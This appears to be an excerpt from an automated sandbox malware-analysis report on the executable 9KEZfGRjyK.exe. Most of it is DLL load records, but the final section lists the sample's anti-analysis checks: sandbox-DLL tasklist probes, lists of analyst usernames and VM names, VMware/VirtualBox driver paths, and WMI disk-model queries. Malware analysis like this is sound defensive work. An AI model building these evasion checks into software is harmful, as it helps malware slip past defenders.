Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\getmac.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\getmac.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\getmac.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\getmac.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\getmac.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\getmac.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\getmac.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\getmac.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\getmac.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\getmac.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\getmac.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\getmac.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\curl.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\systeminfo.exe "systeminfo"
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\tasklist.exe "tasklist" /m sbiedll.dll
Source: 9KEZfGRjyK.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: 9KEZfGRjyK.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 9KEZfGRjyK.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 9KEZfGRjyK.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 9KEZfGRjyK.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 9KEZfGRjyK.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 9KEZfGRjyK.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 9KEZfGRjyK.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: 9KEZfGRjyK.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: data.pdb | source: 9KEZfGRjyK.exe
Source: Binary string: data.pdb)444 | source: 9KEZfGRjyK.exe
Source: 9KEZfGRjyK.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 9KEZfGRjyK.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 9KEZfGRjyK.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 9KEZfGRjyK.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 9KEZfGRjyK.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: 0_2_00007FF7B903AA60 WaitForSingleObjectEx, LoadLibraryA, GetProcAddress, GetProcAddress, GetProcAddress, GetCurrentProcess, GetProcAddress, GetCurrentProcess, lstrlenW, GetCurrentProcessId, CreateMutexA, CloseHandle, GetProcAddress, GetCurrentProcess, GetProcAddress, GetCurrentProcess, ReleaseMutex
Source: 9KEZfGRjyK.exe | Static PE information: section name: .padding
Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\getmac.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: string references (the following concatenated string run appears many times in the listing, with and without the leading "/m"; shown once here, the last repetition is truncated in the original at "...adminroot"): /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel | 0_2_00007FF7B9018B20
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: string references (each run repeated several times in the listing; shown once here, the last repetition is truncated in the original): USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel ; wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq | 0_2_00007FF7B9012720
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: string references (run repeated four times in the listing; shown once): USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel | 0_2_00007FF7B9011000
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: string references (run repeated four times in the listing; shown once): USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel | 0_2_00007FF7B90242E0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Code function: string references (run repeated four times in the listing; shown once): USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel | 0_2_00007FF7B90384D0
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model, Size FROM Win32_DiskDrive
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: tasklist.exe, 00000016.00000002.1780099999.00000299E7920000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: API_LOG.DLL:\US
Source: tasklist.exe, 00000012.00000002.1760924301.000002991D9A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL:\US
Source: tasklist.exe, 00000012.00000002.1760771163.000002991D828000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000003.1760049495.000002991D827000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000003.1759911172.000002991D816000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MSBIEDLL.DLL@
Source: tasklist.exe, 00000016.00000003.1779101879.00000299E7688000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1778941181.00000299E7685000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000002.1779926159.00000299E7689000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: API_LOG.DLL
Source: 9KEZfGRjyK.exeBinary or memory string: DIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLL/MTASKLISTSANDBOXUSERTESTADMINROOTMALWAREANALYSISDEFAULTABBEYADMINISTRATORALBRUNOBRUNOFREDFREDGEORGEGEORGEHARRY JOHNSONLISAPAUL userWORKVTCDEKKERUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMCOMPUTERSYSTEMGETMODEL
Source: tasklist.exe, 00000012.00000002.1760618205.000002991D7F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\DESKTOP\C:\WINDOWS\SYSTEM32\TASKLIST.EXE"TASKLIST" /M SBIEDLL.DLLC:\WINDOWS\SYSTEM32\TASKLIST.EXEWINSTA0\DEFAULT
Source: tasklist.exe, 00000012.00000002.1760618205.000002991D7F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "TASKLIST" /M SBIEDLL.DLL
Source: tasklist.exe, 00000018.00000002.1784817596.000001E4189D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "TASKLIST" /M DIR_WATCH.DLL
